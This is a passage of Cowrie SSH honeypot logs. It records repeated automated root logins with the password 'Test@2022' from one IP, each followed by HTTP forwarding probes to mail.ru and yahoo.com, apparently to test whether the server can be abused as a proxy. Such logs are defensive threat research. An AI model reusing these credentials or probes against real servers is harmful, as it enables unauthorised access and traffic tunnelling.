dsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:18.533473Z","src_ip":"77.83.207.83","session":"76672d317525"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:18.786540Z","src_ip":"77.83.207.83","session":"76672d317525"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":24592,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:24592","sensor":"my-vps","timestamp":"2025-08-31T03:46:18.839375Z","session":"76672d317525"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:18.890211Z","src_ip":"77.83.207.83","session":"76672d317525"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13598,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:13598","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.033152Z","session":"76672d317525"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.083941Z","src_ip":"77.83.207.83","session":"76672d317525"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":19941,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:19941","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.229335Z","session":"76672d317525"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.280232Z","src_ip":"77.83.207.83","session":"76672d317525"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.331875Z","src_ip":"77.83.207.83","session":"76672d317525"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54634,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2cd644fafc8","protocol":"ssh","message":"New connection: 77.83.207.83:54634 (1.2.3.4:22) [session: a2cd644fafc8]","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.382036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.391963Z","src_ip":"77.83.207.83","session":"a2cd644fafc8"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.434016Z","src_ip":"77.83.207.83","session":"a2cd644fafc8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59500,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a51d14d90b7","protocol":"ssh","message":"New connection: 212.227.235.229:59500 (1.2.3.4:22) [session: 8a51d14d90b7]","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.440937Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.686515Z","src_ip":"77.83.207.83","session":"a2cd644fafc8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":9955,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:9955","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.738108Z","session":"a2cd644fafc8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.789047Z","src_ip":"77.83.207.83","session":"a2cd644fafc8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":14896,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:14896","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.932978Z","session":"a2cd644fafc8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:19.983621Z","src_ip":"77.83.207.83","session":"a2cd644fafc8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":23059,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23059","sensor":"my-vps","timestamp":"2025-08-31T03:46:20.125227Z","session":"a2cd644fafc8"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:20.176367Z","src_ip":"77.83.207.83","session":"a2cd644fafc8"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:20.227986Z","src_ip":"77.83.207.83","session":"a2cd644fafc8"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54729,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce9e2e5de1ce","protocol":"ssh","message":"New connection: 77.83.207.83:54729 (1.2.3.4:22) [session: ce9e2e5de1ce]","sensor":"my-vps","timestamp":"2025-08-31T03:46:20.276301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:20.276983Z","src_ip":"77.83.207.83","session":"ce9e2e5de1ce"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:20.327538Z","src_ip":"77.83.207.83","session":"ce9e2e5de1ce"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:20.574395Z","src_ip":"77.83.207.83","session":"ce9e2e5de1ce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":19686,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:19686","sensor":"my-vps","timestamp":"2025-08-31T03:46:20.625042Z","session":"ce9e2e5de1ce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:20.674807Z","src_ip":"77.83.207.83","session":"ce9e2e5de1ce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":7538,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:7538","sensor":"my-vps","timestamp":"2025-08-31T03:46:20.816188Z","session":"ce9e2e5de1ce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:20.866189Z","src_ip":"77.83.207.83","session":"ce9e2e5de1ce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":27377,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:27377","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.008028Z","session":"ce9e2e5de1ce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.057877Z","src_ip":"77.83.207.83","session":"ce9e2e5de1ce"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.108909Z","src_ip":"77.83.207.83","session":"ce9e2e5de1ce"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54811,"dst_ip":"1.2.3.4","dst_port":22,"session":"af83fbbca283","protocol":"ssh","message":"New connection: 77.83.207.83:54811 (1.2.3.4:22) [session: af83fbbca283]","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.157784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.158874Z","src_ip":"77.83.207.83","session":"af83fbbca283"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.208625Z","src_ip":"77.83.207.83","session":"af83fbbca283"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.456790Z","src_ip":"77.83.207.83","session":"af83fbbca283"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":7765,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:7765","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.507736Z","session":"af83fbbca283"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.557505Z","src_ip":"77.83.207.83","session":"af83fbbca283"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":22147,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:22147","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.699980Z","session":"af83fbbca283"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.749690Z","src_ip":"77.83.207.83","session":"af83fbbca283"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":11167,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:11167","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.892106Z","session":"af83fbbca283"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.941826Z","src_ip":"77.83.207.83","session":"af83fbbca283"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:46:21.992272Z","src_ip":"77.83.207.83","session":"af83fbbca283"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":54899,"dst_ip":"1.2.3.4","dst_port":22,"session":"54864641f5fd","protocol":"ssh","message":"New connection: 77.83.207.83:54899 (1.2.3.4:22) [session: 54864641f5fd]","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.041147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.042171Z","src_ip":"77.83.207.83","session":"54864641f5fd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.092154Z","src_ip":"77.83.207.83","session":"54864641f5fd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.341021Z","src_ip":"77.83.207.83","session":"54864641f5fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10665,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10665","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.391948Z","session":"54864641f5fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.441963Z","src_ip":"77.83.207.83","session":"54864641f5fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56782,"dst_ip":"1.2.3.4","dst_port":22,"session":"b19fa38f8a97","protocol":"ssh","message":"New connection: 212.227.235.229:56782 (1.2.3.4:22) [session: b19fa38f8a97]","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.476141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.476945Z","src_ip":"212.227.235.229","session":"b19fa38f8a97"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":9455,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:9455","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.584217Z","session":"54864641f5fd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.634799Z","src_ip":"77.83.207.83","session":"54864641f5fd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":24355,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:24355","sensor":"my-vps","timestamp":"2025-08-31T03:46:22.776369Z","session":"54864641f5fd"}
